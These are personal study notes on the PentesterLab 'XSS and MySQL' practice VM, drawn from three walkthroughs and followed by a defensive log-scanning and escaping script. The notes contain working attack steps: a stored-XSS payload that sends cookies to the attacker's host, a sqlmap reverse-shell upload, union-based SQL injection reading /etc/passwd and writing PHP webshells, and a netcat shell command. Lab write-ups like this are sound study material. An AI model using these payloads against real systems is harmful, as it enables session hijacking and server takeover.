
VM 10 : XSS & MySQL

Walkthru:

1. https://www.sw1tch.net/2014/06/18/walkthrough-for-pentester-lab-xss-and-mysql-file/ [xss, grab cookie, sqlmap blind injection, sqlmap dump database, sqlmap php reverse shell]

2. http://f4l13n5n0w.github.io/blog/2015/05/09/pentesterlab-xss-and-mysql-file/ [union-based injection, getting DB info via URL and uploading a webshell via URL. not working]

3. http://wg135.github.io/blog/2016/04/12/pentesterlab-xss-and-mysql-file/ []

Notes:

https://gnahackteam.wordpress.com/2012/06/08/union-based-basic-sql-injection/ [how to perform union-based (basic) SQL injection, step by step]

1. Add the following to each candidate input field to see which of them is vulnerable to XSS:

 <script>alert('vulnerable')</script>

This alert is stored in the comments field and fires every time the page is loaded.

2. Next, add to the comment field a URL pointing to a PHP server on Kali (the cookie-grabbing code). Also create the PHP page that will be served when the client arrives.

3. content of index-css.php
==============
<?php
$cookie = isset($_GET["test"])?$_GET['test']:'';
?>
=================

4. Start the PHP built-in server from the directory that contains the file.

#php -S 172.16.2.38:80

5. In the text field of the page that is vulnerable to XSS, add
  <script>location.href='http://kali.ip.addr/index-css.php?test='+document.cookie;</script>

6. When the page is loaded, the browser follows the link and leaks the session id to the Kali console. The attacker can grab it, load it into the browser with a cookie manager and potentially log in as admin. Different cookies may appear over time, and several may have to be tried before one grants access. Anyone who views the comment sends us their cookie.

7. Use the cookie and upload the reverse shell to the server. This is not working 100% of the time. Was able to upload the file to either /class or /css but not able to do it any more. Walkthru shows user cannot add files to /class but can to /css, but for me getting "no write privileges" in sqlmap.

sqlmap -u "http://172.16.2.23/admin/edit.php?id=1" --cookie=PHPSESSID=vnr6qcb9s8qb1365mt6l10s830 --file-write="/var/www//html/php-reverse-shell.php" --file-dest="/var/www/css/basic999.php"

============

2. http://f4l13n5n0w.github.io/blog/2015/05/09/pentesterlab-xss-and-mysql-file/ [getting DB info via URL and uploading a webshell via URL]

Exploit the MySQL injection vulnerability and upload a webshell

SQL injection point:
http://192.168.1.149/admin/edit.php?id=2
Try a single quote:
http://192.168.1.149/admin/edit.php?id=2'
Results:
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /var/www/classes/post.php on line 111 Notice: Undefined variable: post in /var/www/classes/post.php on line 115
Now the attacker knows the target web site's absolute path is "/var/www/".
Detect backend DB information
attacking code:
http://192.168.1.149/admin/edit.php?id=2 order by 4 -- - (OK)
http://192.168.1.149/admin/edit.php?id=2 order by 5 -- - (ERROR)


http://192.168.1.149/admin/edit.php?id=-2 union select 1,@@version,user(),4


[
-2 = invalidates the first query so it returns no rows, and the UNION's output becomes the only output printed
@@version = version of the DB
user() = current user
source: http://www.securityidiots.com/Web-Pentest/SQL-Injection/Basic-Union-Based-SQL-Injection.html (look for Union Based Injection)
]
Results:
1
2
MySQL version: 5.1.72-2
current DB user: root@localhost

Because MySQL is running as root, the attacker will gain root privileges....
Use the site below (see "source") to encode/decode the URL.

"2 union select 1,2,"<?php @eval($_POST['chopper'])?>",4 into outfile "/var/www/css/t2.php"- -"
turns into
"2%20union%20select%201%2C2%2C%22%3C%3Fphp%20%40eval%28%24_POST%5B%27chopper%27%5D%29%3F%3E%22%2C4%20into%20outfile%20%22/var/www/css/t2.php%22-%20-"
source [https://www.base64convert.com/url-decoder]

but it is not working when I execute the URL; I get an error and don't see the file created in the css folder
============
3. http://wg135.github.io/blog/2016/04/12/pentesterlab-xss-and-mysql-file/ []
In order to perform a request by SQL injection, you need to find the number of columns that are returned by the first part of the query. Unless you have the source code of the application, you will have to guess this number.

There are two methods to get this information:
1. using UNION SELECT and increasing the number of columns;
2. using the ORDER BY statement.
Here we use the ORDER BY statement to get the number of columns:
http://192.168.79.168/admin/edit.php?id=2 order by 4 -- good
http://192.168.79.168/admin/edit.php?id=2 order by 5 -- error
Now that we know the number of columns, we can retrieve information from the database. Based on the error message we received, we know that the backend database used is MySQL.
get DB version:
http://192.168.79.168/admin/edit.php?id=0%20UNION%20SELECT%201,2,@@version,4
get /etc/passwd file:
http://192.168.79.168/admin/edit.php?id=0%20UNION%20SELECT%201,2,load_file("/etc/passwd"),4
get user info:
http://192.168.79.168/admin/edit.php?id=0%20UNION%20SELECT%201,2,user(),4
Since the user is root, we can now deploy a webshell.
Use http://192.168.79.168/admin/edit.php?id=0 UNION SELECT 1,2,"<?php @eval($_POST['pass'];)?>",4 into outfile "/var/www/css/evil.php" to create evil.php under the css folder. URL-encode the 0 UNION SELECT 1,2,"<?php @eval($_POST['pass'];)?>",4 into outfile "/var/www/css/evil.php" part.
Go to the encoded URL to write the file:
http://172.16.2.23/admin/edit.php?id=0%20UNION%20SELECT%201%2C2%2C%22%3C%3Fphp%20%40eval%28%24_POST%5B%27pass%27%5D%3B%29%3F%3E%22%2C4%20into%20outfile%20%22/var/www/css/evil.php%22

source [https://www.base64convert.com/url-decoder]

Now we can see that evil.php is created successfully.
Cool... Let's write a webshell now:
http://192.168.79.168/admin/edit.php?id=0 UNION select 1,2,"<?php system($_GET['c']); ?>",4 into outfile "/var/www/css/webshell.php"
Of course, encode the 0 UNION select 1,2,"<?php system($_GET['c']); ?>",4 into outfile "/var/www/css/webshell.php" part.
Now run a command:
http://192.168.79.168/css/webshell.php?c=cat /etc/passwd
encode /etc/passwd (Not sure how this is beneficial, so I ran nc -l -p 444 -e /bin/sh and nc victimip 444 and it got me connected as www-user)
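Added example, not from the notes or from any of the walkthroughs: a small detector that URL-decodes request paths from web-server access-log lines and flags the ORDER BY column probing, UNION SELECT, load_file() and INTO OUTFILE markers used in the injection steps above, plus an escaping helper for the comment field that the XSS steps (1 and 5) abuse. The log lines, IPs and timestamps are constructed; the rule names and function names are my own.

```python
import html
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format) modelled on the edit.php requests above; IPs, times and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2016:10:01:02 +0000] "GET /admin/edit.php?id=2 HTTP/1.1" 200 512
10.0.0.5 - - [12/Apr/2016:10:01:09 +0000] "GET /admin/edit.php?id=2%20order%20by%205%20--%20- HTTP/1.1" 200 731
10.0.0.5 - - [12/Apr/2016:10:01:20 +0000] "GET /admin/edit.php?id=0%20UNION%20SELECT%201,2,load_file(%22/etc/passwd%22),4 HTTP/1.1" 200 540
10.0.0.5 - - [12/Apr/2016:10:02:01 +0000] "GET /admin/edit.php?id=0%20UNION%20SELECT%201%2C2%2C%22%3C%3Fphp%20...%3F%3E%22%2C4%20into%20outfile%20%22/var/www/css/evil.php%22 HTTP/1.1" 200 540
10.0.0.7 - - [12/Apr/2016:10:04:00 +0000] "GET /css/style.css HTTP/1.1" 200 2048
"""

# ip, two ignored fields, [timestamp], "METHOD path ..."
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')

# Rules run on the percent-DECODED path, so the URL-encoding step the notes rely on does not hide the payload.
RULES = [
    ("sqli-column-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("sqli-union", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("sqli-file-read", re.compile(r"\bload_file\s*\(", re.I)),
    ("sqli-file-write", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("php-code-in-param", re.compile(r"<\?php", re.I)),
]

def classify_request(path):
    """Return the names of all rules that match the decoded path + query string."""
    decoded = unquote_plus(path)
    return [name for name, rx in RULES if rx.search(decoded)]

def scan_log(text):
    """Return (ip, raw_path, hits) for every log line that trips at least one rule."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            hits = classify_request(m.group("path"))
            if hits:
                findings.append((m.group("ip"), m.group("path"), hits))
    return findings
# Stored-XSS side: keep the comment as submitted, but render it escaped so the <script> payload from steps 1 and 5 becomes inert text.
COOKIE_EXFIL_RE = re.compile(r"<script\b|document\.cookie|location\.href", re.I)
def render_comment(comment):
    """Return (escaped_html, flagged); flagged marks comments worth alerting on."""
    flagged = bool(COOKIE_EXFIL_RE.search(comment))
    return html.escape(comment, quote=True), flagged

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

Server-side, the same injection is closed by a parameterized query for `id`, and the file write by MySQL's `secure_file_priv` and not granting the web user the FILE privilege.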



============
